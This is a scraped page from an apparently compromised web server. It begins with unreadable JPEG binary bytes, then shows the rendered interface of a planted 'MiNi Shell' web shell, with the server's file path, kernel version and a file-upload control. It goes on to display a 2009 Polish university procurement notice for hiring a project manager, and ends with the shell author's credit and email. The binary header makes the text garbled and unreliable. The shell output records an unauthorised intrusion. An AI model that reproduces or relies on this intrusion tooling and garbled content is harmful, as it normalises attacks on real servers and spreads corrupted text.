JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090724/119793-N-2009.html

<p class="kh_header"><b>Kraków: Rekrutacja na stanowisko Kierownika projektu                                  Rozwój potencjału dydaktycznego Politechniki Krakowskiej                     w zakresie nowoczesnego budownictwa,                        realizowanego w ramach Programu Operacyjnego                 Kapitał Ludzki Działanie 4.1</b><br>
<b>Numer ogłoszenia: 119793 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Krakowska im. Tadeusza Kościuszki Dział Zamówień Publicznych , ul. Warszawska 24, 31-155 Kraków, woj. małopolskie, tel. 012 6282641, faks 012 6282072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zampub@pk.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rekrutacja na stanowisko Kierownika projektu                                  Rozwój potencjału dydaktycznego Politechniki Krakowskiej                     w zakresie nowoczesnego budownictwa,                        realizowanego w ramach Programu Operacyjnego                 Kapitał Ludzki Działanie 4.1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rekrutacja na stanowisko Kierownika projektu Rozwój potencjału dydaktycznego Politechniki Krakowskiej w zakresie nowoczesnego budownictwa , realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Działanie 4.1. Wzmocnienie i rozwój potencjału dydaktycznego uczelni oraz zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy. 
Projekt ma zasięg ogólnopolski. Projekt jest skierowany do osób zainteresowanych kształceniem ustawicznym na kierunku budownictwo (1176 osób) oraz absolwentów szkół średnich (216 osób). Okres realizacji projektu : 03.08.2009r. - 31.12.2015r.
Głównym celem projektu jest poprawa potencjału rozwojowego PK poprzez wzmocnienie i dostosowanie oferty edukacyjnej w dziedzinie budownictwa do potrzeb gospodarki opartej na wiedzy do roku 2015.
Celami szczegółowymi projektu są :
- przygotowanie i realizacja 9 szkoleń z zakresu budown. o oczekiwanej tematyce z zakresu budownictwa
- modyfikacja studiów na kierunku budownictwo stopnia I i II 
- przeprowadzenie po 2 edycje zmodyfikowanego kierunku budownictwo stopnia I i II do roku 2015 w języku angielskim
- podniesienie kompetencji kadry dydaktycznej (przez organizację specjalistycznych kursów z jęz. angielskiego).





Wykonawca będzie odpowiedzialny za :
1. administrację projektu,
2. finanse projektu
3. promocję projektu i rekrutacja
4. przygotowanie i realizacje studiów podyplomowych
5. ochronę danych osobowych
Kierownik będzie kontrolował realizację działań we wszystkich w/w
obszarach, zajmował się koordynacją działań oraz w taki sposób organizował
działania by zrealizować założone cele projektu, w tym. m.in.:
-prowadzenie korespondencji z MNiSW
-komunikacja z MNiSW (mailowa, telefoniczna, faxowa, osobista)
-zawieranie umów
-zbieranie i przesyłanie danych typu PEFS
-zatwierdzanie wszystkich dokumentów związanych z projektem (np. karty pracy, wnioski o płatność, dokumenty sprawozdawcze)
-prowadzenie biura projektu
-kierowanie bieżącymi sprawami związanymi z realizacją projektu
-realizacja projektu zgodnie z zapisami umowy o dofinansowanie projektu
-koordynacja prawidłowej realizacji projektu zgodnie z obowiązującymi
przepisami
-koordynacja przygotowywania sprawozdań z realizacji projektu
-utrzymywanie stałego kontaktu z Rektorem, Kanclerzem, Kwestorem PK w celu
bieżącego przekazywania informacji o zaawansowaniu działań projektu oraz dotrzymywania terminowości w działaniach związanych z realizacją projektu
-sporządzanie harmonogramów prac
-organizacja i podział zadań oraz ustalanie zakresu współpracy pomiędzy osobami lub jednostkami realizującymi projekt
-nadzór nad prawidłową realizacją projektu w zakresie merytorycznym oraz
zgodności z przyjętym harmonogramem i planem działań
-prowadzenie nadzoru nad dokumentami i korespondencją projektową w zakresie spraw merytorycznych i formalno-prawnych
-nadzór nad zbieraniem danych na potrzeby monitoringu i sprawozdawczości dotyczącej realizacji projektu
-nadzór nad prowadzeniem postępowań o udzielnie zamówień publicznych
związanych z realizacją zadań projektu
-monitoring realizacji działań projektu: szkoleń, studiów I i II stopnia,specjalistycznych kursów
-kontaktowanie się z uczestnikami projektu
-kontrola pracowników zaangażowanych w projekcie
-ustalanie z pracownikiem od promocji i rekrutacji strategii promocyjnej
-nadzór nad działaniami informującymi, promującymi, rekrutacyjnymi
-udział w procedurach rekrutacyjnych
-nadzór nad prowadzeniem strony internetowej projektu, w tym dbałość o aktualne dane
-koordynowanie archiwizacji dokumentacji projektowej.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1	posiadają uprawnienia do wykonywania określonej działalności lub czynności,
2	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemnne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia

Realizacja zamówienia może być powierzona osobie posiadającej następujące kwalifikacje i umiejętności :
- Wykształcenie wyższe
-Co najmniej 15-letni staż pracy
- Stopień naukowy co najmniej dr habilitowanego, w zakresie inżynierii lądowej 
- Co najmniej 3-letnie doświadczenie związane z zarządzaniem w szkolnictwie wyższym na poziomie co najmniej wydziału
- Doświadczenie związane z uczestnictwem w pracach organów nadzorczych spółek prawa handlowego 
3	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,

Ocena spełnienia warunków będzie dokonywana w oparciu o oświadczenia Wykonawcy i dokumenty wymagane zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane, potwierdzające ich spełnienie wymienione w SIWZ, na zasadzie spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1	formularz oferty   - Załącznik nr 2 do SIWZ 
2	oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych  -  Załącznik nr 1 do SIWZ
3	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej,  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - jeżeli dotyczy
4	wykaz osób -  Załącznik nr 3 do SIWZ
5	pełnomocnictwo - jeżeli ofertę składa pełnomocnik

Inne dokument zalecane do złożenia wraz z ofertą :

1	dokument potwierdzający ukończenie studiów lub dokument potwierdzający posiadanie stopnia lub tytułu naukowego
2	dokument potwierdzający posiadanie stopnia lub tytułu naukowego w zakresie inżynierii lądowej
3	dokument potwierdzający 3-letnie doświadczenie związane z zarządzaniem w szkolnictwie wyższym na poziomie co najmniej wydziału
4	dokument potwierdzający doświadczenie związane z uczestnictwem w pracach organów nadzorczych spółek prawa handlowego.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pk.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego, budynek nr 10-24, pokój nr 110.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2009 godzina 11:30, miejsce: Siedziba zamawiającego, budynek nr 10-24, pokój nr 110.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com